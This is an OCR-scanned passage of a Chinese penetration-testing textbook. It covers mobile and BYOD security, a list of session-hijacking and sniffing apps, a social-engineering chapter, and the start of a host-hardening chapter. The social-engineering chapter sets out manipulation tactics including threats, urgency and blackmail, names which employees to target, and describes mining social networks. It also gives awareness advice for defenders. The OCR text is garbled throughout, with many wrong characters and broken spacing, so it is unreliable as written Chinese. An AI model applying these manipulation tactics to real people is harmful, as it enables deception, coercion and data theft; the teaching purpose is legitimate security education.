用 户 应 尽量 避免 连接 未 知 或 不 受 控 制 的 无 线 接 入 上 后 。 然 而 ， 如 果 别 无 选择 ， 那 么 用 户 可 以 
利用 Intemet 上 的 任何 一 个 VPN 服 务 以 加 密 和 保护 他 们 的 信息 。 


14.5 有 关 目 市 设备 


在 过 去 的 大 约 五 六 年 间 ， 目 带 设 备 (Bring Your Own Device ，BYOD) 是 一 个 在 公司 及 
其 员工 中 文 持 者 数量 均 有 所 上 升 的 趋势 ， 因 此 有 必要 了 解 这 一 体系 的 运作 方式 ， 及 其 对 测 
试 的 影响 。BYOD 做 法 内 含 的 简单 理念 是 ， 公 司 的 员工 在 受 雇佣 时 ， 会 自行 提供 计算 机 和 
设备 。 公 司 目 身 将 拥有 并 维护 一 个 网 络 ， 以 及 文 持 该 网 络 所 需 的 所 有 后 端 设 备 ， 如 服务 
胡 、 电 子 邮件 系统 以 及 其 他 通用 基础 设施 项 目 。 但 员工 将 把 他 们 自己 的 设备 插入 公司 提供 
和 维护 的 网 络 。 现 有 的 使 用 为 其 员工 和 他 们 目 有 技术 设计 的 运营 系统 的 企业 环境 ， 通 第 会 
导致 个 人 以 笔记 本 电脑 、 平 板 电 脑 或 ( 某 些 情况 下 ) 果 面 计算 机 的 形式 带 入 设备 。 在 将 这 些 
设备 带 到 工作 现场 后 ， 员 工 将 它们 接 入 公司 目 己 的 网 络 ， 在 这 些 设备 上 最 新 的 保护 措施 和 
补丁 以 及 其 他 事项 均 已 到 位 ， 通 过 所 有 准 入 检查 的 前 提 下 ， 将 允许 它们 完全 访问 网 络 ， 以 
满足 其 特定 工作 的 需要 。 

尽 党 这 种 做 法 看 上 去 很 好 ， 但 其 中 仍然 存在 一 些 可 能 影响 系统 的 缺陷 ， 作 为 一 名 渗透 
测试 者 ， 你 应 该 注意 这 些 缺 陷 。 它 们 可 能 是 你 成 功 获得 对 网 络 本 身 访 问 权 的 机 会 。 在 安全 
方面 首当其冲 ， 或 者 说 (对 这 种 情况 而 言 ) 曾 弱 系 统 安全 性 的 事实 是 ， 考 虑 到 客户 判 环 境 的 
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多 变 可 能 性 ， 维 护 所 有 这 些 员工 目 市 的 设备 的 安全 环境 是 很 困难 的 。 不 属于 公司 的 设备 可 
能 难以 常理 和 监控 ， 为 多 种 不 同 的 平台 打 补 本 和 提供 支持 同样 困难 重重 。 公 司 可 能 会 选择 
限制 员工 在 可 购买 并 用 于 工作 环境 中 的 设备 类 型 ， 并 且 通 常会 对 应 采取 的 操作 (如 实施 反 
恶意 软件 和 其 他 安全 措施 ) 做 出 明确 的 规定 。 即 使 实施 了 这 些 策略 和 做 法 ，IT 部 门 也 必须 
高 度 警 惕 可 能 出 现在 这 种 环境 中 的 安全 问题 。 


14.6” 选 拌 测试 移动 设备 的 工具 


对 移动 设备 的 渗透 测试 与 对 传统 设备 的 渗透 测试 有 许多 共同 点 。 其 应 用 的 技术 即使 不 
完全 相同 ， 也 非常 相似 ， 概 念 在 几乎 所 有 情况 下 都 是 相同 的 ， 并 且 许多 非 移动 环境 中 的 工 


具 也 存在 于 移动 环境 中 。 
在 学 习 移动 设备 渗透 测试 过 程 时 ， 流 程 本 身 是 相同 的 ， 因 此 你 不 必 适 应 全 新 的 流程 。 


从 侦察 阶段 到 漏洞 利用 后 续 工 作 的 所 有 阶段 表面 上 别 无 二 致 。 主要 区 别 在 于 正在 使 用 的 
平台 (在 本 例 中 为 移动 设备 )， 也 可 能 包括 所 使 用 的 部 分 工具 。 

最 初 ， 在 移动 设备 刚刚 推出 时 ， 可 用 于 渗透 测试 的 工具 数量 相当 有 限 。 许 多 工具 原本 
设计 用 于 排除 网 络 故障 或 搜寻 无 线 网 络 ， 而 此 外 的 功能 相当 有 限 。 然而 ， 随 着 时 间 的 推 


移 ， 已 经 出 现 了 更 多 的 可 用 工具 ， 并 为 渗透 测试 者 提供 了 按照 自己 的 喜好 剪裁 一 套 高 度 定 
制 的 工具 的 可 能 性 。 


如 果 使 用 NetHunter 作 为 渗透 测试 环境 ， 即 可 免除 上 自行 搜寻 和 验证 工具 的 相关 工作 。 
你 也 可 以 选择 使 用 一 个 了 预 配置 的 渗透 测试 环境 (如 NetHunter)， 并 在 此 平台 之 上 安装 目 己 选 
择 的 工具 。 无 论 如 何 ， 按 照 自 己 的 需求 高 度 定制 移动 环境 的 能 力 ， 对 于 作为 渗透 测试 者 
的 你 是 有 利 的 。 

下 文 的 工具 列表 给 出 了 一 些 作为 一 名 移动 测试 人 员 可 在 移动 环境 中 使 用 的 项 目 ， 但 它 
远 非 一 个 穷尽 的 列表 ， 只 是 为 了 介绍 一 些 可 用 于 执行 渗透 测试 的 现 有 工具 。 


网 络 工具 

@ NetworkByte 的 IPtools 是 一 个 用 于 人 查询 不 同 网 络 属性 相关 信息 ， 如 路 由 信息 、DNS 
设置 、IP 配 置 等 信息 的 工具 集合 。 

@ 由 Gao Feng 开 发 的 Mobile Nmap， 正 如 其 名 称 所 描述 的 那样 : 是 强大 的 nmap 端 口 和 
网 络 扫 摘 仪 的 移动 版 本 。 

@ Elviss Kustans 的 Shark for Root 基本 上 是 一 个 用 于 Android 系 统 的 Wireshark 精 简 
版 本 。 


会 项 劫持 工具 
@ Andrew Koch 的 Droidsheep， 可 以 劫持 非 加 密 网 站 的 会 话 ， 并 允许 你 保存 Cookie、 
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文件 和 会 话 供 以 后 分 析 。 

@ FaceNiff 是 一 个 Android 应 用 程序 ， 可 通过 Wi-Fi 网 络 噢 探 和 拦截 Web 会 话 配 置 
文件 。 

@ NotExists 的 SSLStrip 是 一 个 用 于 攻击 启用 SSL 的 会 话 ， 并 剥离 保护 性 SSL 封 装 层 ， 
查看 受 保护 的 数据 的 应 用 程序 。 


代理 服务 怖 工具 
@ SandroProxy 是 一 个 Android 应 用 程序 ， 用 于 将 流量 重 定 加 到 一 个 预先 选 定 的 代理 服 
@ Psiphon 实 际 上 并 非 一 个 代理 服务 器 工具 ， 而 是 一 种 VPN 技 术 ， 可 用 于 保护 进出 移 


动 设备 的 流量 。 
体 持 匿名 


@ Orbot 是 一 个 免费 的 代理 服务 器 app， 可 以 使 其 他 应 用 程序 更 安全 地 使 用 Intermnet。 
@ Orweb 是 专 为 配合 Orbot 使 用 而 设计 的 浏览 器 ， 它 也 是 免费 的 。 
@ Incognito 是 一 种 专 为 私密 浏览 而 设计 的 网 络 浏览 器 。 


14.7 本 况 小 结 


随 痢 移动 设备 的 快速 被 采用 和 进化 ， 许 多 个 人 和 企业 都 选择 将 这 些 设 备 应 用 到 上 日常 环 
境 和 工作 中 。 虽 然 这 提高 了 生产 力 和 便利 性 ， 但 也 对 组 织 的 整体 安全 性 产生 了 影响 ， 而 在 
许多 情况 下 ， 如 果 不 采 取 任 何 预 防 措施 ， 将 意味 着 降低 组 织 的 安全 性 。 拥 有 一 个 小 型 、 始 
终 开 机 连接 到 Intermet、 能 够 随时 进行 几乎 即时 通信 的 设备 对 人 们 具有 巨大 的 吸引 力 ， 在 带 
来 很 多 机 会 的 同时 ， 也 市 来 了 很 多 潜在 的 安全 问题 。 

作为 一 名 渗透 测试 人 员 ， 你 在 本 章 学 习 了 移动 设备 上 各 种 操作 系统 的 安全 模型 。 你 还 
学 习 了 制造 商 为 其 设备 及 其 运行 系统 提供 的 安全 功能 而 采用 不 同 的 技术 。 此 外 ， 本 章 还 介 
绍 了 BYOD 如 何 因 使 用 了 大 量 不 同 设备 而 导致 问题 复杂 化 。 


14.8 ”习题 


1. 使 用 沙 箱 的 目的 是 什么 ? 
2. 列举 一 个 Android 渗 透 测 试 发 行 版 ? 
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3. 1O0S 基 于 哪个 通用 操作 系统 ? 
4. Android 中 SELinux 内 核 有 何 功能 ? 
5. 最 常用 于 创建 Android 应 用 的 开发 环境 是 什么 ? 


进行 社会 工程 攻击 


在 本 章 中 ， 我 们 将 稍微 转换 一 下 话题 ， 不 再 谈论 技术 ， 而 是 转移 到 其 他 攻击 目标 : 正 
在 使 用 系统 的 人 类 。 在 本 书 中 ， 一 直 在 提 及 社会 工程 ， 而 本 章 则 深入 探讨 该 话题 。 考 虑 到 
渗透 测试 人 员 的 角色 需求 ， 你 不 仅 要 了 解 技 术 ， 还 要 了 解 人 类 在 安全 态势 中 所 处 的 位 置 。 
你 需要 了 解 人 们 的 工作 方式 ， 他 们 处 理 信息 的 方式 ， 如 何 利用 他 们 的 行为 方式 以 及 总 体 上 
能 做 哪些 工作 以 评估 他 们 的 地 位 。 


本 章 将 学 习 : 

社会 工程 的 定义 

如 何 寻找 目标 

像 社 会 工程 攻击 者 一 样 行动 
注意 社交 网 络 


a 


15.1 社会 工程 导论 


经 党 能 在 如 志和 其 他 地 方 的 新 闻 与 文章 中 见 到 “社会 工程 ”这 一 术语 。 虽 然 人 们 大 
量 使 用 该 术语 ， 通 常 却 没 有 一 个 对 它 的 清楚 定义 。 社 会 工程 是 一 项 用 于 同人 类 互动 ， 目 的 
在 于 获取 达成 特定 目标 所 需 的 信息 的 技术 。 在 实践 中 ， 在 懂得 如 何 将 该 技术 运用 到 极致 的 
人 手中 ， 社 会 工程 能 够 成 为 一 件 强 有 力 的 工具 。 社 会 工程 共 诗 ， 通 过 将 人 类 作为 目标 ， 和 针 
对 的 是 一 切 系统 最 薄弱 的 部 分 。 技 术 、 政 策 、 流 程 ， 以 及 其 他 措施 (理论 上 ) 都 可 能 是 有 效 
的 ， 但 实际 上 ， 人 类 却 可 能 因 被 欺骗 、 胁 迫 或 被 其 他 方式 操纵 而 泄露 信息。 

社会 工程 是 一 种 有 效 的 工具 ， 在 熟练 掌握 之 后 ， 即 可 应 用 于 渗透 测试 过 程 中 的 多 个 环 
节 。 这 是 因为 社会 工程 是 以 人 类 为 目标 的 ， 而 人 类 又 深度 参与 到 业务 和 技术 的 所 有 方面 。 
请 记 住 ， 通 过 回顾 本 章 ， 今 后 就 能 够 在 获取 信息 的 过 程 中 随时 随地 地 应 用 该 方法 。 

那么 ， 社 会 工程 攻击 者 通常 会 关注 哪些 类 型 的 信息 呢 ? 实际 上 ， 对 于 社会 工程 攻击 
而 言 ， 多 种 不 同类 型 的 信息 都 可 能 有 用 一 一 任何 个 人 信息 、 组 织 信 息 、 项 目 信 息 、 财 务 信 
息 、 技 术 数 据 、 雇 员 姓 名 、 密 码 、 操 作 信 息 ， 以 及 可 能 会 引起 社会 工程 攻击 者 注意 的 其 他 
任何 信息 。 辟 如， 仅 通 过 一 个 电邮 地 址 ， 惑 可 能 泄 露 一 个 用 户 的 登录 名 。 

由 于 一 系列 不 同 的 原因 ， 社 会 工程 方法 是 很 有 效 的 ， 其 中 每 种 原因 都 可 以 从 防御 者 和 
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攻击 者 双方 的 立场 来 表述。 以 下 就 逐一 分 析 这 些 原 因 : 

缺乏 技术 修补 措施 ”技术 能 做 的 事情 很 多 ， 并 且 做 得 很 好 ， 但 技术 并 不 那么 擅长 的 事 
情 之 一 就 是 阻止 社会 工程 攻击 。 虽 然 技 术 手段 确实 能 够 减缓 或 消除 社会 工程 攻击 的 茶 些 影 
啊 ， 但 它 并 非 在 所 有 情况 下 都 100% 有 效 ， 这 就 要 求 以 民 好 的 培训 和 意识 来 补充 。 

检测 困难 ”社会 工程 方法 在 很 多 情况 下 都 十 分 难以 检测 。 尽 宦 有 的 人 看 上 去 只 是 在 问 
些 问题 或 内 聊 ， 但 实际 上 他 们 是 在 直接 或 间接 地 收集 信息 ， 以 供 后 续 使 用 。 

缺乏 培训 许多 公司 未 能 提供 安全 意识 培训 ， 这 导致 像 许多 诸如 社会 工程 之 类 的 威胁 
安全 的 问题 很 难得 到 解决 。 

社会 工程 攻击 者 是 如 何 通 过 人 类 获取 信息 的 呢 ? 作为 一 名 社会 工程 攻击 者 ， 硕 望 让 受 
害 者 透露 信息 ， 而 这 一 般 是 通过 让 对 方 放松 戒备 并 获取 其 信任 来 实现 的 。 受 害 者 透露 的 任 
何 信息 都 可 能 立即 使 用 ， 或 者 有 助 于 微调 下 一 步 攻 击 。 在 下 一 节 中 ， 就 将 介绍 如 何 利用 
人 


15.2 ”利用 人 性 


在 考虑 社会 工程 攻击 者 的 问题 时 ， 将 他 们 与 骗子 同等 看 待 会 有 所 帮助 。 正 如 你 可 能 
知道 的 ， 所 谓 骗子 是 指 利用 骗局 即 某 种 特定 情境 与 受害 者 建立 关系 、 继 而 利用 这 样 的 关系 
来 达成 特定 结果 的 人 。 通 常 ， 所 有 从 事 那 些 被 视 作 社会 工程 的 活动 的 人 ， 都 善于 同人 们 交 
流 、 思 维 敏 捷 、 能 够 理解 胶体 语言 、 能 在 交谈 中 领会 言语 暗示 ， 总 而 言 之 ， 就 是 懂得 人 类 
是 如 何 工 作 和 交流 的 。 接 下 来 ， 社 会 工程 攻击 者 就 能 够 结合 所 有 获取 的 信息 ， 操 纵 受 害 
者 。 虽 然 社会 工程 攻击 者 可 以 通过 很 多 手段 来 实现 其 目标 ， 在 此 将 这 些 手段 分 解 为 几 种 通 
用 的 方法 : 

道德 义务 (Moral Obligation) 使 用 道德 义务 手段 的 攻击 者 能 够 利用 人 们 希望 帮助 他 人 
的 倾 铝 。 例 如 ， 社 会 工程 攻击 者 可 能 会 编造 一 个 故事 ， 声 称 某 个 慈善 机 构 或 事业 正在 征集 
志愿 者 ， 让 目标 人 提供 信息 进行 登记 ， 以 帮助 该 项 事业 。 

信任 (Trust) 信任 是 社会 工程 攻击 者 能 够 极为 成 功 地 利用 的 关键 人 类 行为 之 一 。 信 任 
是 人 们 与 生 俱 来 的 本 能 。 理 解 到 人 类 有 一 种 信任 他 人 的 根本 倾 问 ， 社 会 工程 攻击 者 可 以 找 
到 某 种 途径 来 获取 信任 ， 这 意味 着 与 受害 者 分 享 信息 ， 或 甚至 于 通过 特定 的 穿着 打扮 来 促 
进 信任 。 

威胁 (Threat) ”社会 工程 攻击 者 可 能 会 威胁 不 顺从 其 请 求 的 受害 者 。 现 在 对 于 社会 工 
程 攻击 者 来 说 ， 不 处 神 任 何 警 报 的 话 是 难以 得 手 的 。 使 用 威胁 的 社会 工程 攻击 者 可 能 十 分 
狐 独 ， 也 可 能 无 耻 地 上 暗示， 受害 者 大 不 提供 协助 就 会 陷入 腑 烦 。 例 如 ， 社 会 工程 攻击 者 可 
能 对 不 顺从 的 受害 者 ， 上 暗示 其 可 能 会 因 受 到 请 求 时 不 提供 协助 的 行为 被 报告 给 他 们 的 经 
理 。 然 而 ， 如 果 草 率 地 使 用 威胁 ， 结 果 可 能 适得其反 ， 导 致 受害 者 决心 不 提供 帮助 。 威 胁 
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也 可 能 引起 对 攻击 者 无 法 保守 秘密 的 充分 怀疑 。 

不 劳 而 获 (Something for Nothing) ”攻击 者 可 能 同 受 害 者 承诺， 他 们 不 用 或 只 需要 做 
很 少 的 一 点 工作 ， 就 能 从 协助 攻击 者 中 得 到 好 处 。 攻击 者 可 能 会 说 服 受害 者 ， 作 为 帮助 
他 们 的 报酬 ， 受 害 者 会 得 到 一 个 较 好 的 评语 ， 或 者 获得 某 种 认可 。 

紧急 情况 (Urgency) 社会 工程 攻击 者 可 能 通过 使 受害 者 相信 ， 他 们 在 机 会 消失 之 前 
只 有 有 限 的 行动 时 间 迫 使 受害 者 采取 行动 。 通 过 告知 受害 者 他 们 反应 时 间 有 限 以 驱使 其 行 
动 ， 可 能 具有 很 强 的 催促 效果 。 本 质 上 ， 紧 迫 性 (有 时 称 为 稀缺 性 ) 的 作用 是 增加 受害 者 的 
压力 一 一 也 许 会 驱使 他 们 采取 某 些 行动 或 做 某 些 事情 ， 而 在 有 时 间 充 分 考虑 情况 时 ， 他 们 
是 不 会 这 样 做 的 。 例 如 ， 假 设 在 饭店 里 你 想 不 好 该 点 什么 沫 。 你 最 终 将 选择 缩小 到 三 种 菜 
品 之 一 。 如 果 有 无 限 的 时 间 考 虑 ， 你 最 终 将 能 选 定 三 者 中 想 要 的 那 一 种 ， 就 此 完成 选择 。 
但 是 ， 如 果 情 况 变 为 在 接 下 来 的 60 秒 内 就 要 选 出 三 者 之 一 ， 那 么 做 决定 就 将 更 为 困难 。 在 
某 些 情况 下 ， 所 做 的 决定 会 让 你 事后 怀疑 该 决定 到 底 是 否 正确 。 

敲诈 勒索 (Blackmail or Extortion) ”敲诈 勒索 也 可 能 有 效 地 从 受害 者 处 获取 信息 。 例 
如 ， 可 以 利用 某 个 受害 者 的 赌博 问题 ， 或 者 其 他 的 不 体面 或 成 疗 性 行为 ， 敲 诈 其 提供 信息 。 


1S.3 ” 像 社会 工程 攻击 者 那样 行动 


潜在 的 基于 社会 工程 方法 的 攻击 可 能 有 很 多 迹象 ， 以 下 列举 了 一 些 常 见 的 迹象 : 

冒 用 权威 ”攻击 者 可 能 会 公开 宣称 他 们 是 条 人 或 认识 系 人 ， 甚 至 根据 他 们 宣称 的 权力 
或 权威 实施 威胁 。 通 第 情 况 下 ， 受 害 者 能 够 辨别 茶 人 在 试图 滥用 权威 胁迫 他 们 。 攻 击 者 时 
常用 攀 龙 附 凤 之 类 的 手段 ， 因 而 他 们 企图 胁迫 或 多 吓 受害 者 ， 按 其 愿望 行动 的 行径 昭然 大 
揭 。 了 解 这 种 利用 权威 来 强迫 服从 的 手段 的 受害 者 ， 将 不 仅 能 阻止 攻击 ， 还 能 够 通知 公司 
的 安全 部 门 。 

无 法 提供 有 效 联系 信息 受害 者 可 能 要 求 攻击 者 提供 信息 ， 以 便 为 后 续 事 务 或 问题 回 
应 进行 联系 。 如 果 攻 击 者 没有 做 好 适当 的 准备 ， 他 们 会 试图 回避 这 样 的 问题 ， 提 供 虚假 的 
细节 ， 或 者 在 回答 问题 时 党 利文 吾 停 顿 。 

使 用 人 情 关 系 ” 这 包括 提出 非 正式 的 或 者 “ 潜 规 则 ”的 请 求 ， 以 促使 受害 者 提供 在 其 
他 情况 下 不 会 提供 的 信息 。 虽 然 在 工作 中 ， 人 们 相互 请 求 帮 点 小 忙 ， 或 做 些 这 样 那样 “ 洪 
规则 ”的 小 事 的 情况 并 不 罕见 ， 但 有 时 这 可 能 表明 男 有 攻 些 隐情 。 在 短 时 间 内 要 求 过 多 通 
融 的 人 ， 也 许 就 是 在 妾 试 绕 过 安全 控制 ， 其 至 可 能 利用 受害 者 的 信任 。 

重要 人 士 或 擎 龙 附 凤 ”过 度 的 攀 龙 附 凤 在 当今 并 不 第 见 ， 却 可 能 被 用 来 获取 组 织 中 的 
信任 和 信心 。 不 过 ， 大 多 数 人 都 能 意识 到 ， 过 度 的 攀 龙 附 凤 不 仅 令 人 反感 ， 还 可 能 是 男 有 
隐情 的 征兆 。 


212 BS 


鼓动 自负 ”用 过 上 度 赞 扬 与 茶 维 来 奉承 受害 者 ， 是 一 个 确定 无 疑 的 说 明 对 方 有 所 谋划 的 
人 迹象。 尽管 从 一 个 人 那里 听 到 很 多 赞扬 并 非 总 是 件 坏事 ， 但 受害 者 还 是 需要 提高 警惕 ， 因 
为 过 分 的 赞扬 能 导致 受害 者 放松 防备 、 产 生 上 自负， 从 而 更 可 能 泄露 那些 严 加 保守 的 秘密 。 

不 适 ”被 提问 时 表现 出 不 适 或 局 促 ， 并 不 总 是 意味 着 被 问 者 是 个 坏人 或 是 在 揭 鬼 ， 这 
可 能 只 是 因为 那 人 不 习惯 被 提问 而 已 。 不 过 ， 有 些 人 在 被 询问 时 会 勉强 拼 凌 党 案 ， 也 可 能 
避 而 不 答 ， 甚 至 顾 左 右 而 言 他 ， 以 避免 不 得 不 回答 受害 者 提出 的 问题 。 


15.4 选择 特定 的 受害 者 


攻击 者 会 寻找 那些 有 可 能 提供 最 多 收获 的 目标 。 第 见 的 一 些 目标 包括 接待 员 、 客 服 人 
员 、 用 户 、 行 政 管理 人 员 、 系 统管 理 员 、 外 部 供应 商 ， 甚 至 维护 人 员 。 

记 住 ， 组 织 中 的 任何 人 都 可 能 成 为 社会 工程 攻击 的 受害 者 ， 但 有 些 人 一 一 因为 其 可 能 
掌握 的 信息 或 易于 接触 到 的 程度 一 一 特别 容易 被 当 作 目标 。 接 下 来 的 清单 列举 了 一 些 容易 
被 社会 工程 实施 者 鹏 上 的 候选 者 一 一 但 肯定 不 止 列 出 来 的 这 些 。 

@ 接待 员 作 为 访客 们 在 许多 公司 中 过 到 的 头 一 个 人 ， 是 首要 的 目标 。 他 们 目睹 很 多 

人 在 办 公 室 进 进出 出 ， 也 能 昕 到 许多 事情 。 此 外 ， 接 等 员 的 职责 本 就 是 热心 助 
人 ， 因 而 并 不 关注 安全 。 与 这 些 人 建立 友好 关系 ， 能 够 轻易 获得 有 用 的 (或 对 未 来 
攻击 有 用 的 ) 信 息 。 记 住 ， 接 待 员 未 必 永 远 只 做 接待 员 的 工作 ， 他 们 可 能 还 有 别 的 
职员 。 他 们 可 能 还 会 做 撰写 报告 或 项 目 杂 务 之 类 的 工作 。 这 意味 着 他 们 所 处 理 的 
信息 可 能 远 远 多 于 签到 表 和 公司 花 名 册 。 

@ 客服 人 员 提供 了 另 一 个 有 价值 的 诱 人 目标 ， 因 为 他 们 可 能 掌握 着 有 关 基 础 设施 以 

及 其 他 方面 的 信息 。 提 区 伪造 的 文 持 请 求 ， 或 询问 这 些 人 一 些 诱导 性 的 问题 ， 就 
能 获得 有 价值 的 情报 。 切 记 ， 虽 然 客 服 人 员 是 社会 工程 攻击 的 可 行 目 标 ， 但 他 们 
并 不 一 定 总 会 有 关于 网 络 及 基础 设施 的 有 价值 的 或 详细 的 情报 。 客 服 人 员 通 背 便 
于 联系 ， 但 他 们 一 般 不 是 负责 维护 网 络 和 系统 的 人 ， 因 此 只 掌握 有 限 的 信息 。 

@ 系统 管理 员 也 很 有 机 会 成 为 高 价值 目标 ， 同 样 是 因为 他 们 所 和 掌握 的 信息 。 通 第 管 
理 员 会 擎 握 关 于 基础 设施 、 应 用 和 未 来 工作 计划 等 方面 的 高 等 级 情报 。 只 要 恰当 
然 思 并 多 加 努力 ， 这 些 目标 有 时 将 可 能 提供 大 量 情报 。 

@ 行政 党 理 人 员 是 军 贵 的 信息 来 源 ， 也 是 攻击 者 的 首要 目标 之 一 ， 因 为 在 这 类 职位 
上 的 人 往往 不 关注 安全 问题 。 实 际 上 ， 许 多 这 类 职务 人 士 天 心 的 是 业务 流程 、 销 
售 、 财 务 和 其 他 方面 。 尽 管 行 政 管理 人 员 可 能 并 不 擎 握 技 术 数 据 ， 但 不 要 因 这 一 
事实 放弃 以 他 们 为 目标 ， 因 为 他 们 会 拥有 关于 目标 组 织 的 其 他 重要 信息 ， 这 些 信 
恩 同 样 有 用 ， 且 其 中 还 可 能 包含 有 助 于 令 测试 顺利 进行 的 信息 。 
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@ 用 户 可 能 是 信息 泄露 的 最 主要 来 源 之 一 ， 因 为 每 天 操作 、 处 理 、 管 理 信息 的 人 是 
他 们 。 同 时 ， 这 些 人 当中 的 许多 人 又 往往 远 未 为 安全 地 处 理 这 些 信息 做 好 准备 。 

@ 没有 经 过 识别 社会 工程 攻击 相关 训练 的 新 员工 也 是 首要 目标 之 一 。 

@ 那些 可 能 会 在 下 班 时 间 ( 比 如 上 晚上) 工作 的 清洁 工 也 可 能 是 有 效 的 目标 。 记 住 ， 他 们 
拥有 关于 设施 及 其 人 员 的 详细 信息 ， 并 且 询 问 他 们 的 机 会 很 多 。 


15.5 利用 社交 网 络 


社交 网 络 和 社交 媒体 是 过 去 十 年 或 更 长 的 时 间 里 Web 技 术 的 最 大 发展 成 果 之 一 。 该 领 
域 应 用 的 搁 术 和 服务 ， 使 得 人 们 只 需要 单 击 几 次 按钮 就 能 与 朋友 或 所 有 的 人 分 译 信 息 。 这 
些 服 务 的 用 户 会 做 的 事情 无 所 不 包 ， 从 发 帖 将 他 们 的 所 思 所 想 或 手头 工作 厂 而 告 之 ， 到 分 
圣 那 些 也 许 并 不 太 适 合 在 公共 相册 中 张贴 的 照片 或 其 他 详细 信息 。 正 是 因为 如 此 ， 这 些 服 
务 为 通过 人 类 获取 信息 的 行动 提供 了 一 个 有 价值 的 目标 一 一 还 有 哪些 其 他 地 方 ， 服 务 的 用 
户 会 不 假 思 索 地 目 由 分 享 信息 呢 ? 

社交 网 络 技术 的 迅速 发 展 ， 令 数 以 百 万 计 的 用 户 每 天 在 脸 书 、 推 条 、Instagram 以 及 许 
多 其 他 网 络 上 发 布 信息 。 社 交 网 络 上 存在 着 海量 信息 ， 使 其 成 为 一 个 绝 佳 数据 来 源 。 

让 如 此 丰 刘 的 信息 可 供 访问 的 危险 在 于 ， 一 个 好 奇 的 攻击 者 可 以 很 简单 地 从 这 些 信息 
源 中 整合 线 索 ， 从 而 绘制 出 清晰 得 多 的 目标 图 景 。 掌 握 了 这 些 信 息 ， 攻 击 者 就 能 够 坎 贞 地 
仿冒 目标 的 人 员 ， 或 通过 使 用 内 部 人 员 信 息 混 进 业 务 流程 之 中 。 

当 员工 们 在 社交 网 络 或 其 他 站 点 上 发 布 信息 时 ， 应 当 始 终 意识 到 一 点 ， 即 信息 对 于 不 
当 人 员 可 能 会 有 多 大 价值 ， 以 及 此 信息 是 否 值得 发 布 。 在 社交 网 络 上 搜索 和 发 现 茶 人 或 许 
无 意 间 分 享 的 信息 是 很 容易 的 。 社 区 网 络 给 予 员工 们 不 需要 事前 三 思 就 快速 简便 地 扩散 信 
恩 的 能 力 。 公 司 已 经 意识 到 其 员工 能 够 发 布 他 们 想 发 布 的 任何 东西 ， 而 且 任何 人 都 有 可 能 
接触 和 看 到 公司 那些 不 可 告 人 的 秘密 。 

只 要 采取 简单 的 几 步 来 强化 账户 ， 就 能 使 社交 媒体 更 安全 。 实 际 上 ， 在 许多 场合 都 发 
现 : 只 要 稍微 付出 一 点 谨慎 和 努力 ， 就 能 落实 一 系列 措施 ， 以 减轻 或 避免 许多 第 见 的 安全 
问题 与 风险 。 
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社交 网 络 流行 得 如 此 之 快 ， 以 至 于 人 们 几乎 没有 时 间 应 对 该 技术 所 带 来 的 不 断 进化 演 
变 的 一 系列 问题 。 公 众 已 经 意识 到 了 人 危险， 也 明白 了 危险 的 严重 性 ， 并 且 知道 他 们 需要 采 
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取 措 施 来 保护 自己。 公司 规章 应 当 解 决 恰当 使 用 社交 媒体 的 问题 ， 例 如 规定 在 这 些 站 皇上 
员工 允许 进行 的 行为 和 使 用 的 语言 等 。 
只 要 小 心 行事 ， 是 可 以 相当 安全 和 可 徘 地 使 用 社交 网 络 的 。 应 用 一 些 基本 的 安全 措施 
可 以 极 大 地 降低 使 用 这 些 服务 的 风险 。 作 为 渗透 测试 者 ， 可 可 以 按照 下 面 的 一 系列 做 法 培训 
用 户 ( 如 果 客 户 选择 在 合同 中 包含 这 些 的 话 ): 
@ 劝阻 在 社交 网 络 环境 中 混 消 个 人 与 职业 信息 的 行为 。 尽 管 这 可 能 无 法 完全 避免 公 
司 信息 被 分 享 出 去 ， 但 至 少 可 以 将 其 保持 在 最 低 限 度 。 
@ 避免 在 多 个 社交 网 络 站 扣 或 位 置 重复 使 用 相同 的 密码 ， 以 防止 被 大 批量 攻陷 。 
@ 不 要 把 任何 东西 者 发布 到 网 上 ， 要 记 住 任何 发 布 出 来 的 东西 都 能 被 找到 一 一 有 时 
甚至 是 在 几 年 L 
避免 发 布 个 人 信息 ， 以 防止 其 被 用 来 进一步 判断 你 的 情况 、 冒 充 你 或 哄 驴 他 人 汇 
露 更 多 关于 你 的 信息 。 
@ 避免 在 网 上 公布 任何 个 人 喘 份 信息 ， 包 括 电 话 号 码 、 工 作 或 家 庭 成 员 的 照片 ， 以 
及 任何 可 能 用 于 判定 身份 的 信息 。 
@ 要 知道 ， 对 于 这 些 社交 网 络 系 统 ， 任 何 东西 一 旦 被 发 布 到 网 上 就 会 一 直 留 在 网 
上 ， 即 使 发 布 者 删除 了 它们 。 在 本 质 上 ,信息 一 旦 发 布 到 网 上 就 永远 不 会 消失 。 


@ 及 时 使 用 脸 书 之 类 站 点 上 的 最 新 隐私 功能 。 
@ 指导 员工 关于 社交 网 络 上 网 络 钓 鱼 的 存在 以 及 如 何 避 人 免 和 报告 它们 。 


15.7 本 况 小 结 


一 名 懂得 人 性 的 特点 并 且 知 道 如 何 利 用 的 渗透 测试 者 ， 能 够 十 分 容易 地 获取 各 种 类 型 
和 重要 程度 的 信息 。 在 某 些 情况 下 ， 与 通过 其 他 手段 获取 信息 相 比 ， 社 会 工程 是 一 个 更 好 
更 有 效 的 信息 来 源 。 

此 外 ， 数 以 百 万 计 的 人 通过 脸 书 、 推 特 、Foursquare 和 其 他 社交 网 站 上 网 。 社 交 网 络 
中 乐趣 与 危险 并 存 ， 此 外 还 极 具 成 瘾 性 一 有 些 用 户 每 次 吃饭 或 上 厕所 时 都 会 更 新 。 虽 然 
这 项 技术 使 得 人 们 可 以 在 网 上 保持 联系 ， 分 享 快 乐 时 光 ， 与 朋友 交谈 ， 在 线 交 换个 人 信 
息 ， 但 也 存在 着 可 能 导致 灾难 的 风险 。 


1S.8 “习题 


1. 何谓 社会 工程 ? 

2. 攻击 者 将 如 何 利用 权威 实施 社会 工程 攻击 ? 
3. 为 何 社区 网 络 对 获取 信息 很 有 用 ? 

4. 防范 社会 工程 攻击 最 有 效 的 措施 是 什么 ? 
5. 为 何 勒索 对 社会 工程 攻击 者 有 用 ? 
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加 固 主 机 系统 


组 织 的 计算 机 系统 对 其 运转 能 力 至 关 重 要 。 计 算 机 系统 通常 执 行 诸如 数据 处 理 、 承 载 
服务 以 及 承载 或 存储 数据 等 任务 。 

如 你 所 知 ， 这 些 系 统 也 是 对 攻击 者 极 具 诱 惑 力 的 目标 。 认 识 到 可 能 削 能 组织 的 威胁 和 
脆弱 性 具有 重要 意义 ， 也 是 驱动 渗透 测试 者 的 主要 动机 之 一 ， 但 是 知道 如 何在 攻击 之 前 积 
